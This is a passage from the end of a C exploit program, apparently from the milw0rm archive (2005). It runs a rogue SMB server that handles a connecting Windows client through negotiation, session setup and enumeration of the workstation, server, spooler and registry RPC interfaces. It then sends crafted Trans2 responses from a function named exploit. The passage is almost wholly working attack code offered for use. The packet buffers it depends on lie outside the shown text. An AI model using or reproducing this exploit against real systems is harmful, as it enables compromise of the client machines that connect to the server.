523			if ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )

524				{ wks++; j = 1; }

525			if ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )

526				{ srv++; j = 1; }

527			if ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )

528				{ spl++; j = 1; }

529			if ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )

530				{ wrg++; j = 1; }

531			if ( j == 0 )

532				foo++;

533		}

534		else

535		{

536			if ( str[120 + i] == wks_uuid[i] )

537				{ wks++; j = 1; }

538			if ( str[120 + i] == srv_uuid[i] )

539				{ srv++; j = 1; }

540			if ( str[120 + i] == spl_uuid[i] )

541				{ spl++; j = 1; }

542			if ( str[120 + i] == wrg_uuid[i] )

543				{ wrg++; j = 1; }

544			if ( j == 0 )

545				foo++;

546		}

547	}

548	if ( wks == 16 )

549		return ( 0 );

550	else if ( srv == 16 )

551		return ( 1 );

552	else if ( spl == 16 )

553		return ( 2 );

554	else if ( wrg == 16 )

555		return ( 3 );

556	else

557	{

558		printf ( "there is/are %d invalid byte(s) in the interface UUID!\n", foo );

559		return ( -1 );

560	}

561}

562

563void

564neg ( int s )

565{

566	char response[1024];

567

568	bzero ( &response, sizeof ( response ) );

569	recv ( s, response, sizeof ( response ) -1, 0 );

570

571	send ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );

572}

573

574void

575sessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )

576{

577	char response[1024];

578	unsigned char ntlm_challenge1[] = "\xa2\x75\x1b\x10\xe7\x62\xb0\xc3";

579	unsigned char ntlm_challenge2[] = "\xe1\xed\x43\x66\xc7\xa7\x36\xbd";

580

581	bzero ( &response, sizeof ( response ) );

582	recv ( s, response, sizeof ( response ) -1, 0 );

583

584	printf ( "SessionSetupAndXNeg\n" );

585	SessionSetupAndXNeg[30] = response[30];

586	SessionSetupAndXNeg[31] = response[31];

587	SessionSetupAndXNeg[34] = response[34];

588	SessionSetupAndXNeg[35] = response[35];

589

590	strncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );

591	if ( option == 0 )

592		memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );

593	else

594		memcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );

595

596	send ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );

597

598	bzero ( &response, sizeof ( response ) );

599	recv ( s, response, sizeof ( response ) -1, 0 );

600

601	printf ( "SessionSetupAndXAuth\n" );

602	SessionSetupAndXAuth[30] = response[30];

603	SessionSetupAndXAuth[31] = response[31];

604	SessionSetupAndXAuth[34] = response[34];

605	SessionSetupAndXAuth[35] = response[35];

606

607	strncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );

608

609	send ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );

610

611	bzero ( &response, sizeof ( response ) );

612	recv ( s, response, sizeof ( response ) -1, 0 );

613

614	printf ( "TreeConnectAndX\n" );

615	TreeConnectAndX[30] = response[30];

616	TreeConnectAndX[31] = response[31];

617	TreeConnectAndX[34] = response[34];

618	TreeConnectAndX[35] = response[35];

619

620	strncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );

621	strncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );

622

623	send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );

624}

625

626void

627digg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )

628{

629	int ret;

630	char response[1024];

631	unsigned char srv[] = "\x73\x72\x76";

632	unsigned char wks[] = "\x77\x6b\x73";

633

634	bzero ( &response, sizeof ( response ) );

635	recv ( s, response, sizeof ( response ) -1, 0 );

636

637	printf ( "SmbNtCreate\n" );

638	SmbNtCreate[30] = response[30];

639	SmbNtCreate[31] = response[31];

640	SmbNtCreate[34] = response[34];

641	SmbNtCreate[35] = response[35];

642

643	strncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );

644	strncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );

645	strncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );

646

647	send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );

648

649	bzero ( &response, sizeof ( response ) );

650	recv ( s, response, sizeof ( response ) -1, 0 );

651

652	printf ( "DceRpc\n" );

653	DceRpc[30] = response[30];

654	DceRpc[31] = response[31];

655	DceRpc[34] = response[34];

656	DceRpc[35] = response[35];

657

658	strncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );

659	strncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );

660	strncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );

661

662	ret = check_interface ( response );

663	if ( ret == 0 )

664		memcpy ( DceRpc + 92, wks, 3 );

665	else if ( ret == 1 )

666		memcpy ( DceRpc + 92, srv, 3 );

667	else if ( ret == 2 );

668	else if ( ret == 3 );

669	else

670	{

671		printf ( "invalid interface uuid, aborting...\n" );

672		exit ( 1 );

673	}

674

675	send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );

676

677	bzero ( &response, sizeof ( response ) );

678	recv ( s, response, sizeof ( response ) -1, 0 );

679

680	if ( option == 1 )

681	{

682		printf ( "NetrShareEnum\n" );

683		NetrShareEnum[30] = response[30];

684		NetrShareEnum[31] = response[31];

685		NetrShareEnum[34] = response[34];

686		NetrShareEnum[35] = response[35];

687

688		strncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );

689		strncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );

690

691		send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );

692	}

693	else if ( ( option == 2 ) && ( ret == 2 ) )

694	{

695		printf ( "OpenPrinterEx\n" );

696		OpenPrinterEx[30] = response[30];

697		OpenPrinterEx[31] = response[31];

698		OpenPrinterEx[34] = response[34];

699		OpenPrinterEx[35] = response[35];

700

701		strncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );

702		strncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );

703

704		send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );

705

706		bzero ( &response, sizeof ( response ) );

707		recv ( s, response, sizeof ( response ) -1, 0 );

708

709		printf ( "ClosePrinter\n" );

710		ClosePrinter[30] = response[30];

711		ClosePrinter[31] = response[31];

712		ClosePrinter[34] = response[34];

713		ClosePrinter[35] = response[35];

714

715		strncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );

716		strncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );

717

718		send ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );

719	}

720	else if ( ( option == 3 ) && ( ret == 3 ) )

721	{

722		printf ( "OpenHklm\n" );

723		OpenHklm[30] = response[30];

724		OpenHklm[31] = response[31];

725		OpenHklm[34] = response[34];

726		OpenHklm[35] = response[35];

727

728		strncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );

729		strncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );

730

731		send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );

732

733		bzero ( &response, sizeof ( response ) );

734		recv ( s, response, sizeof ( response ) -1, 0 );

735

736		printf ( "OpenKey\n" );

737		OpenKey[30] = response[30];

738		OpenKey[31] = response[31];

739		OpenKey[34] = response[34];

740		OpenKey[35] = response[35];

741

742		strncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );

743		strncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );

744

745		send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );

746

747		bzero ( &response, sizeof ( response ) );

748		recv ( s, response, sizeof ( response ) -1, 0 );

749

750		printf ( "CloseKey\n" );

751		CloseKey[30] = response[30];

752		CloseKey[31] = response[31];

753		CloseKey[34] = response[34];

754		CloseKey[35] = response[35];

755

756		strncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );

757		strncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );

758

759		send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );

760	}

761	else if ( option == 4 )

762	{

763		printf ( "NetBios1\n" );

764		NetBios1[30] = response[30];

765		NetBios1[31] = response[31];

766		NetBios1[34] = response[34];

767		NetBios1[35] = response[35];

768

769		strncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );

770		strncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );

771

772		send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );

773	}

774	else

775	{

776		if ( ret == 0 )

777		{

778			printf ( "WksSvc\n" );

779			WksSvc[30] = response[30];

780			WksSvc[31] = response[31];

781			WksSvc[34] = response[34];

782			WksSvc[35] = response[35];

783

784			strncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );

785			strncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );

786

787			send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );

788		}

789		else

790		{

791			printf ( "SrvSvc\n" );

792			SrvSvc[30] = response[30];

793			SrvSvc[31] = response[31];

794			SrvSvc[34] = response[34];

795			SrvSvc[35] = response[35];

796

797			strncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );

798			strncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );

799

800			send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );

801		}

802	}

803

804	bzero ( &response, sizeof ( response ) );

805	recv ( s, response, sizeof ( response ) -1, 0 );

806

807	printf ( "SmbClose\n" );

808	SmbClose[30] = response[30];

809	SmbClose[31] = response[31];

810	SmbClose[34] = response[34];

811	SmbClose[35] = response[35];

812

813	strncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );

814	strncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );

815

816	send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );

817}

818

819void

820exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )

821{

822	char response[1024];

823

824	bzero ( &response, sizeof ( response ) );

825	recv ( s, response, sizeof ( response ) -1, 0 );

826

827	printf ( "NetBios2\n" );

828	NetBios2[30] = response[30];

829	NetBios2[31] = response[31];

830	NetBios2[34] = response[34];

831	NetBios2[35] = response[35];

832

833	strncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );

834	strncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );

835

836	send ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );

837

838	bzero ( &response, sizeof ( response ) );

839	recv ( s, response, sizeof ( response ) -1, 0 );

840

841	printf ( "Trans2Response1\n" );

842	Trans2Response1[30] = response[30];

843	Trans2Response1[31] = response[31];

844	Trans2Response1[34] = response[34];

845	Trans2Response1[35] = response[35];

846

847	strncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );

848	strncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );

849

850	send ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );

851

852	bzero ( &response, sizeof ( response ) );

853	recv ( s, response, sizeof ( response ) -1, 0 );

854

855	printf ( "Trans2Response2\n" );

856	Trans2Response2[30] = response[30];

857	Trans2Response2[31] = response[31];

858	Trans2Response2[34] = response[34];

859	Trans2Response2[35] = response[35];

860

861	strncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );

862	strncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );

863

864	send ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );

865

866	bzero ( &response, sizeof ( response ) );

867	recv ( s, response, sizeof ( response ) -1, 0 );

868

869	printf ( "Trans2Response3\n" );

870	Trans2Response3[30] = response[30];

871	Trans2Response3[31] = response[31];

872	Trans2Response3[34] = response[34];

873	Trans2Response3[35] = response[35];

874

875	strncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );

876	strncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );

877

878	send ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );

879}

880

881int

882main ( int argc, char* argv[] )

883{

884	int s1, s2, i;

885	unsigned long fid = 0x1337;

886	unsigned long treeid = 0x0808;

887	unsigned long userid = 0x0808;

888	unsigned long assocgroup = 0x4756;

889	pid_t childpid;

890	socklen_t clilen;

891	struct sockaddr_in cliaddr, servaddr;

892

893	bzero ( &servaddr, sizeof ( servaddr ) );

894	servaddr.sin_family = AF_INET;

895	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );

896	servaddr.sin_port = htons ( PORT );

897

898	s1 = socket ( AF_INET, SOCK_STREAM, 0 );

899	bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );

900	listen ( s1, 1 );

901

902	clilen = sizeof ( cliaddr );

903

904	s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );

905

906	close ( s1 );

907

908	printf ( "\n%s\n\n", inet_ntoa ( cliaddr.sin_addr ) );

909

910	neg ( s2 );                                             // Negotiate

911	sessionsetup ( s2, userid, treeid, 0 );                 // SessionSetup

912	for ( i = 0; i < 15; i++ )

913	{

914		digg ( s2, fid, assocgroup, userid, treeid, 0 );

915		fid++;

916		assocgroup ++;

917	}

918	digg ( s2, fid, assocgroup, userid, treeid, 1 );        // NetrShareEnum

919	fid++;

920	assocgroup ++;

921	digg ( s2, fid, assocgroup, userid, treeid, 2 );        // spoolss

922	fid++;

923	assocgroup ++;

924	for ( i = 0; i < 4; i++ )

925	{

926		digg ( s2, fid, assocgroup, userid, treeid, 0 );

927		fid++;

928		assocgroup ++;

929	}

930	digg ( s2, fid, assocgroup, userid, treeid, 3 );         // WinReg

931	userid++;

932	treeid++;

933	sessionsetup ( s2, userid, treeid, 1 );                  // SessionSetup

934	userid--;

935	treeid--;

936	for ( i = 0; i < 2; i++ )

937	{

938		digg ( s2, fid, assocgroup, userid, treeid, 4 );     // NetBios

939		fid++;

940		assocgroup ++;

941	}

942	treeid += 2;

943	exploit ( s2, fid, assocgroup, userid, treeid );

944

945	printf ( "done!\n" );

946

947	close ( s2 );

948}

949

950// milw0rm.com [2005-06-23]